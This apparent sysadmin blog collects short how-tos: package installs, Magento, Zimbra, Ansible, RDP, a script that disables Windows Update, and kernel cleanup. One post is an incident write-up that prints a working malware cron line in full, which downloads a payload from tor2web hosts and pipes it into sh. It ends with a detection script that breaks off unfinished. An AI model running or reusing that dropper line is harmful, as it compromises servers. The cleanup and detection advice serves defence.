Categories
Uncategorized

Basic Packages for a fresh installed Ubuntu 16 / 18 / 19

sudo apt-get update
sudo apt-get install shutter vlc vim screen wget -y
wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
sudo dpkg -i --force-depends google-chrome-stable_current_amd64.deb
sudo apt-get install -f
wget https://linux.palemoon.org/datastore/release/pminstaller-0.2.4.tar.bz2
bunzip2 pminstaller-0.2.4.tar.bz2
tar xvf pminstaller-0.2.4.tar
bash pminstaller.sh
rm -fr README pminstaller* google-chrome-stable_current_amd64.deb

 

Categories
Magento

Get BaseURLs from Database via CLI – Magento

Log in to MySQL as root or as a limited user, then select the database:

use the-d2.com_db;

MariaDB > select * from core_config_data where path like '%base%url%';
+-----------+---------+----------+-----------------------------+------------------------------------------+
| config_id | scope | scope_id | path | value |
+-----------+---------+----------+-----------------------------+------------------------------------------+
| 52 | default | 0 | web/unsecure/base_url | https://www.the-d2.com/ |
| 53 | default | 0 | web/unsecure/base_link_url | {{unsecure_base_url}} |
| 54 | default | 0 | web/unsecure/base_skin_url | {{unsecure_base_url}}skin/ |
| 55 | default | 0 | web/unsecure/base_media_url | {{unsecure_base_url}}media/ |
| 56 | default | 0 | web/unsecure/base_js_url | {{unsecure_base_url}}js/ |
| 57 | default | 0 | web/secure/base_url | https://www.the-d2.com/ |
| 58 | default | 0 | web/secure/base_link_url | {{secure_base_url}} |
| 59 | default | 0 | web/secure/base_skin_url | https://the-d2.com/the-d2image/skin/ |
| 60 | default | 0 | web/secure/base_media_url | https://the-d2.com/the-d2image/media/ |
| 61 | default | 0 | web/secure/base_js_url | https://the-d2.com/the-d2image/js/ |
| 855 | default | 0 | system/mgt_base/feed_url | https://www.the-d2.com/feed |
+-----------+---------+----------+-----------------------------+------------------------------------------+
11 rows in set (0.00 sec)

 

Categories
Zimbra

[Solved] Zimbra – Unable to start TLS: SSL connect attempt failed error

Error while restarting zimbra/zmcontrol service

 

Starting ldap...Done.
Unable to start TLS: SSL connect attempt failed error:14090086:SSL routines:ssl3_get_server_certificate:certificate verify failed when connecting to ldap master.

Solution

su - zimbra
zmlocalconfig -e ldap_starttls_required=true
zmlocalconfig -e ldap_starttls_supported=1
zmcontrol restart

 

 

Categories
Ansible

Install MySQL 5.7 on CentOS via Ansible – Playbook .yml

---
- name: Install MySQL
  hosts: test123
  become: true
  remote_user: navdeepd2
  become_method: sudo
  gather_facts: true
  tasks:
    - name: "Installing Repo"
      shell: sudo rpm -Uvh http://dev.mysql.com/get/mysql57-community-release-el6-7.noarch.rpm
      ignore_errors: yes
    - name: "Installing MySQL 5.7"
      package: name=mysql-community-server state=present
    - name: Start the MySQL service
      become: true
      service: 
        name: mysqld
        state: started
        enabled: true
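    - name: Find MySQL root password
      # MySQL 5.7 logs the generated temporary password for root@localhost on first start
      shell: "grep 'temporary.*root@localhost' /var/log/mysqld.log | sed 's/.*root@localhost: //'"
      register: mysql_root_pass
    # Prints the temporary root password in the play output
    - debug: var=mysql_root_pass.stdout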

 

Categories
Powershell Scripts

Change Windows server RDP port via Powershell/CLI command

Open PowerShell as Admin and run the command below. It sets the RDP port to 3400; change the value to the port of your choice.

Set-ItemProperty -Path "HKLM:System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" -Name PortNumber -Value 3400

 

Categories
Powershell Scripts

Disable Windows Server Update via Powershell/CLI

Create a file with Notepad, paste the code below into it and save it as disable_update.ps1. Then open PowerShell as Admin and run it with ./disable_update.ps1

$WUSettings = (New-Object -com "Microsoft.Update.AutoUpdate").Settings
$WUSettings.NotificationLevel=1
$WUSettings.save()




$WindowsUpdatePath = "HKLM:SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\"
$AutoUpdatePath = "HKLM:SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU"

If(Test-Path -Path $WindowsUpdatePath) {
Remove-Item -Path $WindowsUpdatePath -Recurse
}

New-Item -Path $WindowsUpdatePath
New-Item -Path $AutoUpdatePath

Set-ItemProperty -Path $AutoUpdatePath -Name NoAutoUpdate -Value 1

 

 

Categories
Uncategorized

List of Processes consuming most of the RAM/Memory with ps command – Linux

This command lists the processes that consume the most RAM. I am using 'head -n 10' to show only the top 10 memory-intensive processes; you may remove it from the end of the command.
Command:

ps -eo size,pid,user,command --sort -size | awk '{ hr=$1/1024 ; printf("%13.2f Mb ",hr) } { for ( x=4 ; x<=NF ; x++ ) { printf("%s ",$x) } print "" }' | head -n 10

 

5312.29 Mb /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib64/mysql/plugin --user=mysql --log-error=/var/log/mysqld.log --pid-file=/var/lib/mysql/server.the-d2.com.pid --socket=/var/lib/mysql/mysql.sock
1060.39 Mb /usr/bin/node /home/the-d2/public_html/main.js
426.16 Mb /usr/bin/clamscan -
363.12 Mb memcached -d -p 11211 -u memcached -m 1024 -c 1024 -P /var/run/memcached/memcached.pid -l 127.0.0.1
223.23 Mb /sbin/rsyslogd -i /var/run/syslogd.pid -c 5
54.77 Mb /usr/libexec/webmin/virtual-server/lookup-domain-daemon.pl
23.51 Mb lfd - sleeping
16.94 Mb /usr/bin/php-cgi
16.25 Mb /usr/bin/perl /usr/libexec/webmin/miniserv.pl /etc/webmin/miniserv.conf
16.25 Mb /usr/bin/perl /usr/libexec/webmin/miniserv.pl /etc/webmin/miniserv.conf
16.25 Mb /usr/bin/perl /usr/libexec/webmin/miniserv.pl /etc/webmin/miniserv.conf
16.25 Mb /usr/bin/perl /usr/libexec/webmin/miniserv.pl /etc/webmin/miniserv.conf
16.25 Mb /usr/bin/perl /usr/libexec/webmin/miniserv.pl /etc/webmin/miniserv.conf
16.25 Mb /usr/bin/perl /usr/libexec/webmin/miniserv.pl /etc/webmin/miniserv.conf
16.11 Mb /usr/bin/perl /usr/libexec/webmin/miniserv.pl /etc/webmin/miniserv.conf

 

 


 

Categories
Uncategorized

WSUS and SUP – Windows Server Update Services / Software Update Point

WSUS:
Windows Server Update Services (WSUS) enables information technology administrators to deploy the latest Microsoft product updates.

What is it? https://www.youtube.com/watch?v=LkeGluvR6C8

Install and Configure WSUS in Windows Server 2012 R2: https://www.youtube.com/watch?v=Rb4Rl8VrP6U

SUP:
Software Update Point

What is it? http://info.adaptivedge.com/blog/understanding-sccm-sup-process

Setup: https://www.youtube.com/watch?v=JeEjYUdhYEQ

Categories
Uncategorized

Huge waste disk space – Remove Multiple Old kernels worth 3GB (Total 116 packages)

But keep the current or latest one.

Reading state information… Done
The following packages will be REMOVED:
liblua5.1-0 linux-headers-4.10.0-38 linux-headers-4.10.0-38-generic linux-headers-4.10.0-40 linux-headers-4.10.0-40-generic linux-headers-4.10.0-42 linux-headers-4.10.0-42-generic
linux-headers-4.13.0-26 linux-headers-4.13.0-26-generic linux-headers-4.13.0-31 linux-headers-4.13.0-31-generic linux-headers-4.13.0-32 linux-headers-4.13.0-32-generic linux-headers-4.13.0-36
linux-headers-4.13.0-36-generic linux-headers-4.13.0-37 linux-headers-4.13.0-37-generic linux-headers-4.13.0-38 linux-headers-4.13.0-38-generic linux-headers-4.13.0-39 linux-headers-4.13.0-39-generic
linux-headers-4.13.0-41 linux-headers-4.13.0-41-generic linux-headers-4.13.0-43 linux-headers-4.13.0-43-generic linux-headers-4.13.0-45 linux-headers-4.13.0-45-generic linux-headers-4.15.0-24
linux-headers-4.15.0-24-generic linux-headers-4.15.0-29 linux-headers-4.15.0-29-generic linux-headers-4.15.0-30 linux-headers-4.15.0-30-generic linux-headers-4.15.0-32 linux-headers-4.15.0-32-generic
linux-headers-4.15.0-33 linux-headers-4.15.0-33-generic linux-headers-4.15.0-34 linux-headers-4.15.0-34-generic linux-headers-4.15.0-36 linux-headers-4.15.0-36-generic linux-headers-4.15.0-39
linux-headers-4.15.0-39-generic linux-headers-4.15.0-42 linux-headers-4.15.0-42-generic linux-headers-4.15.0-43 linux-headers-4.15.0-43-generic linux-headers-4.15.0-45 linux-headers-4.15.0-45-generic
linux-headers-4.15.0-46 linux-headers-4.15.0-46-generic linux-headers-4.15.0-47 linux-headers-4.15.0-47-generic linux-headers-4.15.0-50 linux-headers-4.15.0-50-generic linux-headers-4.15.0-52
linux-headers-4.15.0-52-generic linux-image-4.10.0-38-generic linux-image-4.10.0-40-generic linux-image-4.10.0-42-generic linux-image-4.13.0-26-generic linux-image-4.13.0-31-generic
linux-image-4.13.0-32-generic linux-image-4.13.0-36-generic linux-image-4.13.0-37-generic linux-image-4.13.0-38-generic linux-image-4.13.0-39-generic linux-image-4.13.0-41-generic
linux-image-4.13.0-43-generic linux-image-4.13.0-45-generic linux-image-4.15.0-24-generic linux-image-4.15.0-29-generic linux-image-4.15.0-30-generic linux-image-4.15.0-32-generic
linux-image-4.15.0-33-generic linux-image-4.15.0-34-generic linux-image-4.15.0-36-generic linux-image-4.15.0-39-generic linux-image-4.15.0-42-generic linux-image-4.15.0-43-generic
linux-image-4.15.0-45-generic linux-image-4.15.0-46-generic linux-image-4.15.0-47-generic linux-image-4.15.0-50-generic linux-image-4.15.0-52-generic linux-modules-4.15.0-24-generic
linux-modules-4.15.0-29-generic linux-modules-4.15.0-30-generic linux-modules-4.15.0-32-generic linux-modules-4.15.0-33-generic linux-modules-4.15.0-34-generic linux-modules-4.15.0-36-generic
linux-modules-4.15.0-39-generic linux-modules-4.15.0-42-generic linux-modules-4.15.0-43-generic linux-modules-4.15.0-45-generic linux-modules-4.15.0-46-generic linux-modules-4.15.0-47-generic
linux-modules-4.15.0-50-generic linux-modules-4.15.0-52-generic
0 upgraded, 0 newly installed, 100 to remove and 139 not upgraded.
After this operation, 4,462 MB disk space will be freed.
Do you want to continue? [Y/n]

[email protected]:~# dpkg -l | grep kernel
ii kmod 22-1ubuntu5 amd64 tools for managing Linux kernel modules
ii libaio1:amd64 0.3.110-2 amd64 Linux kernel AIO access library – shared library
ii libdrm2:amd64 2.4.76-1~ubuntu16.04.1 amd64 Userspace interface to kernel DRM services — runtime
ii linux-headers-4.10.0-38 4.10.0-38.42~16.04.1 all Header files related to Linux kernel version 4.10.0
ii linux-headers-4.10.0-38-generic 4.10.0-38.42~16.04.1 amd64 Linux kernel headers for version 4.10.0 on 64 bit x86 SMP
ii linux-headers-4.10.0-40 4.10.0-40.44~16.04.1 all Header files related to Linux kernel version 4.10.0
ii linux-headers-4.10.0-40-generic 4.10.0-40.44~16.04.1 amd64 Linux kernel headers for version 4.10.0 on 64 bit x86 SMP
ii linux-headers-4.10.0-42 4.10.0-42.46~16.04.1 all Header files related to Linux kernel version 4.10.0
ii linux-headers-4.10.0-42-generic 4.10.0-42.46~16.04.1 amd64 Linux kernel headers for version 4.10.0 on 64 bit x86 SMP
ii linux-headers-4.13.0-26 4.13.0-26.29~16.04.2 all Header files related to Linux kernel version 4.13.0
ii linux-headers-4.13.0-26-generic 4.13.0-26.29~16.04.2 amd64 Linux kernel headers for version 4.13.0 on 64 bit x86 SMP
ii linux-headers-4.13.0-31 4.13.0-31.34~16.04.1 all Header files related to Linux kernel version 4.13.0
ii linux-headers-4.13.0-31-generic 4.13.0-31.34~16.04.1 amd64 Linux kernel headers for version 4.13.0 on 64 bit x86 SMP
ii linux-headers-4.13.0-32 4.13.0-32.35~16.04.1 all Header files related to Linux kernel version 4.13.0
ii linux-headers-4.13.0-32-generic 4.13.0-32.35~16.04.1 amd64 Linux kernel headers for version 4.13.0 on 64 bit x86 SMP
ii linux-headers-4.13.0-36 4.13.0-36.40~16.04.1 all Header files related to Linux kernel version 4.13.0
ii linux-headers-4.13.0-36-generic 4.13.0-36.40~16.04.1 amd64 Linux kernel headers for version 4.13.0 on 64 bit x86 SMP
ii linux-headers-4.13.0-37 4.13.0-37.42~16.04.1 all Header files related to Linux kernel version 4.13.0
ii linux-headers-4.13.0-37-generic 4.13.0-37.42~16.04.1 amd64 Linux kernel headers for version 4.13.0 on 64 bit x86 SMP
ii linux-headers-4.13.0-38 4.13.0-38.43~16.04.1 all Header files related to Linux kernel version 4.13.0
ii linux-headers-4.13.0-38-generic 4.13.0-38.43~16.04.1 amd64 Linux kernel headers for version 4.13.0 on 64 bit x86 SMP
ii linux-headers-4.13.0-39 4.13.0-39.44~16.04.1 all Header files related to Linux kernel version 4.13.0
ii linux-headers-4.13.0-39-generic 4.13.0-39.44~16.04.1 amd64 Linux kernel headers for version 4.13.0 on 64 bit x86 SMP
ii linux-headers-4.13.0-41 4.13.0-41.46~16.04.1 all Header files related to Linux kernel version 4.13.0
ii linux-headers-4.13.0-41-generic 4.13.0-41.46~16.04.1 amd64 Linux kernel headers for version 4.13.0 on 64 bit x86 SMP
ii linux-headers-4.13.0-43 4.13.0-43.48~16.04.1 all Header files related to Linux kernel version 4.13.0
ii linux-headers-4.13.0-43-generic 4.13.0-43.48~16.04.1 amd64 Linux kernel headers for version 4.13.0 on 64 bit x86 SMP
ii linux-headers-4.13.0-45 4.13.0-45.50~16.04.1 all Header files related to Linux kernel version 4.13.0
ii linux-headers-4.13.0-45-generic 4.13.0-45.50~16.04.1 amd64 Linux kernel headers for version 4.13.0 on 64 bit x86 SMP
ii linux-headers-4.15.0-24 4.15.0-24.26~16.04.1 all Header files related to Linux kernel version 4.15.0
ii linux-headers-4.15.0-24-generic 4.15.0-24.26~16.04.1 amd64 Linux kernel headers for version 4.15.0 on 64 bit x86 SMP
ii linux-headers-4.15.0-29 4.15.0-29.31~16.04.1 all Header files related to Linux kernel version 4.15.0
ii linux-headers-4.15.0-29-generic 4.15.0-29.31~16.04.1 amd64 Linux kernel headers for version 4.15.0 on 64 bit x86 SMP
ii linux-headers-4.15.0-30 4.15.0-30.32~16.04.1 all Header files related to Linux kernel version 4.15.0
ii linux-headers-4.15.0-30-generic 4.15.0-30.32~16.04.1 amd64 Linux kernel headers for version 4.15.0 on 64 bit x86 SMP
ii linux-headers-4.15.0-32 4.15.0-32.35~16.04.1 all Header files related to Linux kernel version 4.15.0
ii linux-headers-4.15.0-32-generic 4.15.0-32.35~16.04.1 amd64 Linux kernel headers for version 4.15.0 on 64 bit x86 SMP
ii linux-headers-4.15.0-33 4.15.0-33.36~16.04.1 all Header files related to Linux kernel version 4.15.0
ii linux-headers-4.15.0-33-generic 4.15.0-33.36~16.04.1 amd64 Linux kernel headers for version 4.15.0 on 64 bit x86 SMP
ii linux-headers-4.15.0-34 4.15.0-34.37~16.04.1 all Header files related to Linux kernel version 4.15.0
ii linux-headers-4.15.0-34-generic 4.15.0-34.37~16.04.1 amd64 Linux kernel headers for version 4.15.0 on 64 bit x86 SMP
ii linux-headers-4.15.0-36 4.15.0-36.39~16.04.1 all Header files related to Linux kernel version 4.15.0
ii linux-headers-4.15.0-36-generic 4.15.0-36.39~16.04.1 amd64 Linux kernel headers for version 4.15.0 on 64 bit x86 SMP
ii linux-headers-4.15.0-39 4.15.0-39.42~16.04.1 all Header files related to Linux kernel version 4.15.0
ii linux-headers-4.15.0-39-generic 4.15.0-39.42~16.04.1 amd64 Linux kernel headers for version 4.15.0 on 64 bit x86 SMP
ii linux-headers-4.15.0-42 4.15.0-42.45~16.04.1 all Header files related to Linux kernel version 4.15.0
ii linux-headers-4.15.0-42-generic 4.15.0-42.45~16.04.1 amd64 Linux kernel headers for version 4.15.0 on 64 bit x86 SMP
ii linux-headers-4.15.0-43 4.15.0-43.46~16.04.1 all Header files related to Linux kernel version 4.15.0
ii linux-headers-4.15.0-43-generic 4.15.0-43.46~16.04.1 amd64 Linux kernel headers for version 4.15.0 on 64 bit x86 SMP
ii linux-headers-4.15.0-45 4.15.0-45.48~16.04.1 all Header files related to Linux kernel version 4.15.0
ii linux-headers-4.15.0-45-generic 4.15.0-45.48~16.04.1 amd64 Linux kernel headers for version 4.15.0 on 64 bit x86 SMP
ii linux-headers-4.15.0-46 4.15.0-46.49~16.04.1 all Header files related to Linux kernel version 4.15.0
ii linux-headers-4.15.0-46-generic 4.15.0-46.49~16.04.1 amd64 Linux kernel headers for version 4.15.0 on 64 bit x86 SMP
ii linux-headers-4.15.0-47 4.15.0-47.50~16.04.1 all Header files related to Linux kernel version 4.15.0
ii linux-headers-4.15.0-47-generic 4.15.0-47.50~16.04.1 amd64 Linux kernel headers for version 4.15.0 on 64 bit x86 SMP
ii linux-headers-4.15.0-50 4.15.0-50.54~16.04.1 all Header files related to Linux kernel version 4.15.0
ii linux-headers-4.15.0-50-generic 4.15.0-50.54~16.04.1 amd64 Linux kernel headers for version 4.15.0 on 64 bit x86 SMP
ii linux-headers-4.15.0-51 4.15.0-51.55~16.04.1 all Header files related to Linux kernel version 4.15.0
ii linux-headers-4.15.0-51-generic 4.15.0-51.55~16.04.1 amd64 Linux kernel headers for version 4.15.0 on 64 bit x86 SMP
ii linux-headers-4.15.0-52 4.15.0-52.56~16.04.1 all Header files related to Linux kernel version 4.15.0
ii linux-headers-4.15.0-52-generic 4.15.0-52.56~16.04.1 amd64 Linux kernel headers for version 4.15.0 on 64 bit x86 SMP
ii linux-headers-4.15.0-54 4.15.0-54.58~16.04.1 all Header files related to Linux kernel version 4.15.0
ii linux-headers-4.15.0-54-generic 4.15.0-54.58~16.04.1 amd64 Linux kernel headers for version 4.15.0 on 64 bit x86 SMP
ii linux-headers-4.15.0-55 4.15.0-55.60~16.04.2 all Header files related to Linux kernel version 4.15.0
ii linux-headers-4.15.0-55-generic 4.15.0-55.60~16.04.2 amd64 Linux kernel headers for version 4.15.0 on 64 bit x86 SMP
ii linux-headers-generic-hwe-16.04 4.15.0.55.76 amd64 Generic Linux kernel headers
ii linux-headers-virtual-hwe-16.04 4.15.0.55.76 amd64 Virtual Linux kernel headers
ii linux-image-4.10.0-38-generic 4.10.0-38.42~16.04.1 amd64 Linux kernel image for version 4.10.0 on 64 bit x86 SMP
ii linux-image-4.10.0-40-generic 4.10.0-40.44~16.04.1 amd64 Linux kernel image for version 4.10.0 on 64 bit x86 SMP
ii linux-image-4.10.0-42-generic 4.10.0-42.46~16.04.1 amd64 Linux kernel image for version 4.10.0 on 64 bit x86 SMP
ii linux-image-4.13.0-26-generic 4.13.0-26.29~16.04.2 amd64 Linux kernel image for version 4.13.0 on 64 bit x86 SMP
ii linux-image-4.13.0-31-generic 4.13.0-31.34~16.04.1 amd64 Linux kernel image for version 4.13.0 on 64 bit x86 SMP
ii linux-image-4.13.0-32-generic 4.13.0-32.35~16.04.1 amd64 Linux kernel image for version 4.13.0 on 64 bit x86 SMP
ii linux-image-4.13.0-36-generic 4.13.0-36.40~16.04.1 amd64 Linux kernel image for version 4.13.0 on 64 bit x86 SMP
ii linux-image-4.13.0-37-generic 4.13.0-37.42~16.04.1 amd64 Linux kernel image for version 4.13.0 on 64 bit x86 SMP
ii linux-image-4.13.0-38-generic 4.13.0-38.43~16.04.1 amd64 Linux kernel image for version 4.13.0 on 64 bit x86 SMP
ii linux-image-4.13.0-39-generic 4.13.0-39.44~16.04.1 amd64 Linux kernel image for version 4.13.0 on 64 bit x86 SMP
ii linux-image-4.13.0-41-generic 4.13.0-41.46~16.04.1 amd64 Linux kernel image for version 4.13.0 on 64 bit x86 SMP
ii linux-image-4.13.0-43-generic 4.13.0-43.48~16.04.1 amd64 Linux kernel image for version 4.13.0 on 64 bit x86 SMP
ii linux-image-4.13.0-45-generic 4.13.0-45.50~16.04.1 amd64 Linux kernel image for version 4.13.0 on 64 bit x86 SMP
ii linux-image-4.15.0-24-generic 4.15.0-24.26~16.04.1 amd64 Signed kernel image generic
ii linux-image-4.15.0-29-generic 4.15.0-29.31~16.04.1 amd64 Signed kernel image generic
ii linux-image-4.15.0-30-generic 4.15.0-30.32~16.04.1 amd64 Signed kernel image generic
ii linux-image-4.15.0-32-generic 4.15.0-32.35~16.04.1 amd64 Signed kernel image generic
ii linux-image-4.15.0-33-generic 4.15.0-33.36~16.04.1 amd64 Signed kernel image generic
ii linux-image-4.15.0-34-generic 4.15.0-34.37~16.04.1 amd64 Signed kernel image generic
ii linux-image-4.15.0-36-generic 4.15.0-36.39~16.04.1 amd64 Signed kernel image generic
ii linux-image-4.15.0-39-generic 4.15.0-39.42~16.04.1 amd64 Signed kernel image generic
ii linux-image-4.15.0-42-generic 4.15.0-42.45~16.04.1 amd64 Signed kernel image generic
ii linux-image-4.15.0-43-generic 4.15.0-43.46~16.04.1 amd64 Signed kernel image generic
ii linux-image-4.15.0-45-generic 4.15.0-45.48~16.04.1 amd64 Signed kernel image generic
ii linux-image-4.15.0-46-generic 4.15.0-46.49~16.04.1 amd64 Signed kernel image generic
ii linux-image-4.15.0-47-generic 4.15.0-47.50~16.04.1 amd64 Signed kernel image generic
ii linux-image-4.15.0-50-generic 4.15.0-50.54~16.04.1 amd64 Signed kernel image generic
ii linux-image-4.15.0-51-generic 4.15.0-51.55~16.04.1 amd64 Signed kernel image generic
ii linux-image-4.15.0-52-generic 4.15.0-52.56~16.04.1 amd64 Signed kernel image generic
ii linux-image-4.15.0-54-generic 4.15.0-54.58~16.04.1 amd64 Signed kernel image generic
ii linux-image-4.15.0-55-generic 4.15.0-55.60~16.04.2 amd64 Signed kernel image generic
ii linux-image-virtual-hwe-16.04 4.15.0.55.76 amd64 Virtual Linux kernel image
ii linux-modules-4.15.0-24-generic 4.15.0-24.26~16.04.1 amd64 Linux kernel extra modules for version 4.15.0 on 64 bit x86 SMP
ii linux-modules-4.15.0-29-generic 4.15.0-29.31~16.04.1 amd64 Linux kernel extra modules for version 4.15.0 on 64 bit x86 SMP
ii linux-modules-4.15.0-30-generic 4.15.0-30.32~16.04.1 amd64 Linux kernel extra modules for version 4.15.0 on 64 bit x86 SMP
ii linux-modules-4.15.0-32-generic 4.15.0-32.35~16.04.1 amd64 Linux kernel extra modules for version 4.15.0 on 64 bit x86 SMP
ii linux-modules-4.15.0-33-generic 4.15.0-33.36~16.04.1 amd64 Linux kernel extra modules for version 4.15.0 on 64 bit x86 SMP
ii linux-modules-4.15.0-34-generic 4.15.0-34.37~16.04.1 amd64 Linux kernel extra modules for version 4.15.0 on 64 bit x86 SMP
ii linux-modules-4.15.0-36-generic 4.15.0-36.39~16.04.1 amd64 Linux kernel extra modules for version 4.15.0 on 64 bit x86 SMP
ii linux-modules-4.15.0-39-generic 4.15.0-39.42~16.04.1 amd64 Linux kernel extra modules for version 4.15.0 on 64 bit x86 SMP
ii linux-modules-4.15.0-42-generic 4.15.0-42.45~16.04.1 amd64 Linux kernel extra modules for version 4.15.0 on 64 bit x86 SMP
ii linux-modules-4.15.0-43-generic 4.15.0-43.46~16.04.1 amd64 Linux kernel extra modules for version 4.15.0 on 64 bit x86 SMP
ii linux-modules-4.15.0-45-generic 4.15.0-45.48~16.04.1 amd64 Linux kernel extra modules for version 4.15.0 on 64 bit x86 SMP
ii linux-modules-4.15.0-46-generic 4.15.0-46.49~16.04.1 amd64 Linux kernel extra modules for version 4.15.0 on 64 bit x86 SMP
ii linux-modules-4.15.0-47-generic 4.15.0-47.50~16.04.1 amd64 Linux kernel extra modules for version 4.15.0 on 64 bit x86 SMP
ii linux-modules-4.15.0-50-generic 4.15.0-50.54~16.04.1 amd64 Linux kernel extra modules for version 4.15.0 on 64 bit x86 SMP
ii linux-modules-4.15.0-51-generic 4.15.0-51.55~16.04.1 amd64 Linux kernel extra modules for version 4.15.0 on 64 bit x86 SMP
ii linux-modules-4.15.0-52-generic 4.15.0-52.56~16.04.1 amd64 Linux kernel extra modules for version 4.15.0 on 64 bit x86 SMP
ii linux-modules-4.15.0-54-generic 4.15.0-54.58~16.04.1 amd64 Linux kernel extra modules for version 4.15.0 on 64 bit x86 SMP
ii linux-modules-4.15.0-55-generic 4.15.0-55.60~16.04.2 amd64 Linux kernel extra modules for version 4.15.0 on 64 bit x86 SMP
ii linux-virtual-hwe-16.04 4.15.0.55.76 amd64 Minimal Generic Linux kernel and headers
ii rsyslog 8.16.0-1ubuntu3 amd64 reliable system and kernel logging daemon
[email protected]:~#

Categories
Uncategorized

[Solved] an7kmd2wp4xo7hpr.tor2web.su Malicious Processes/Crons – Linux

1. Malicious Processes

A. Identify the malicious processes and the URL name they contact; in the case below it is an7kmd2wp4xo7hpr.tor2web.su
B. Use the command ps aux

root 26561 0.0 0.0 139556 4392 ? S Aug20 0:00 wget --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /etc/cron.monthly/cron
root 28777 0.0 0.0 139556 4384 ? S Aug21 0:00 wget --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /etc/cron.monthly/cron
root 24990 0.0 0.0 106076 1380 ? Ss 20:56 0:00 /bin/sh -c R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/d
root 24991 0.0 0.0 106076 1380 ? Ss 20:56 0:00 /bin/sh -c R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/d
root 24992 0.0 0.0 106076 1376 ? Ss 20:56 0:00 /bin/sh -c R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/d

2. Malicious Crons

A. Now take the same URL name and grep for it across the whole server
B. The command is below
[[email protected] ~]# grep -rli an7kmd2wp4xo7hpr    /
/etc/cron.d/root
/etc/cron.monthly/cronlog
/etc/crontab

[[email protected] ~]# cat /etc/cron.d/root
*/7 * * * * root R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ];then G1="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && G1="$f" && break;done;fi;G2="wget";if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ];then G2="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "to <[email protected]>" && G2="$f" && break;done;fi;if [ $(cat /etc/hosts|grep -i "onion.\|timesync.su\|tor2web"|wc -l) -ne 0 ];then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1;fi; C=" -fsSLk --connect-timeout 26 --max-time 75 ";W=" --quiet --tries=1 --no-check-certificate --connect-timeout=26 --timeout=75 ";H="https://an7kmd2wp4xo7hpr";T1=".tor2web.su/";T2=".d2web.org/";T3=".onion.sh/";P="src/ldm";($G1 $C $H$T1$P||$G1 $C $H$T2$P||$G1 $C $H$T3$P||$G2 $W $H$T1$P||$G2 $W $H$T2$P||$G2 $W $H$T3$P)|sh &

[[email protected] ~]# cat /etc/crontab
*/7 * * * * root R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ];then G1="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && G1="$f" && break;done;fi;G2="wget";if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ];then G2="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "to <[email protected]>" && G2="$f" && break;done;fi;if [ $(cat /etc/hosts|grep -i "onion.\|timesync.su\|tor2web"|wc -l) -ne 0 ];then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1;fi; C=" -fsSLk --connect-timeout 26 --max-time 75 ";W=" --quiet --tries=1 --no-check-certificate --connect-timeout=26 --timeout=75 ";H="https://an7kmd2wp4xo7hpr";T1=".tor2web.su/";T2=".d2web.org/";T3=".onion.sh/";P="src/ldm";($G1 $C $H$T1$P||$G1 $C $H$T2$P||$G1 $C $H$T3$P||$G2 $W $H$T1$P||$G2 $W $H$T2$P||$G2 $W $H$T3$P)|sh &

 

Solutions:-

A. Remove the malicious code from the crons, or wherever you find it, and for the time being set chattr on those files as well
B. chattr +i /etc/cron.d/root ; chattr +i /etc/crontab
C.
- Change the root password immediately
- Remove all authorized keys, for all users, that are not yours

ls -lahd /home/*/.ssh/auth*
ls -lahd /root/.ssh/auth*

- ClamAV - Antivirus
- Maldet - Malware Detector
- Restricting SSH from particular IPs/VPN
- Restricting MySQL from particular IPs/VPN
- CSF Firewall
- LFD Login Failure Daemon
- WAF Web Application Firewall
- ModSecurity with HTTP/Apache
- Avoid using the MySQL root user password in application code; create a non-root MySQL user instead.
- Proper permissions and ownership of code files, such as 755 for dirs and 644 for files.
- Non-standard SSH port
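
The grep in step 2 only finds files that contain the known host name. As an added example (not part of the original post), the script below flags cron entries by the traits visible in the cron line above instead: output piped into sh, TLS verification switched off, Tor gateway host names, and a rewrite of /etc/hosts. The function names and the sample cron files are constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example. The rules mirror traits of the cron line shown on this page;
# function names and sample files are constructed for illustration.

# check_line LINE -> prints the comma-separated labels of the rules LINE matches
check_line() {
  local line="$1" hits=""
  # anything piped straight into a shell interpreter
  printf '%s\n' "$line" | grep -Eq '\|[[:space:]]*(/bin/)?(ba)?sh([[:space:];&]|$)' \
    && hits="$hits,pipe-to-shell"
  # TLS verification switched off for wget or curl (heuristic for curl -k)
  printf '%s\n' "$line" \
    | grep -Eq -e '--no-check-certificate|--insecure|curl.*[[:space:]]-[A-Za-z]*k' \
    && hits="$hits,tls-verify-off"
  # Tor gateway or onion host names
  printf '%s\n' "$line" | grep -Eiq 'tor2web|\.onion' && hits="$hits,tor-gateway"
  # redirect that overwrites /etc/hosts
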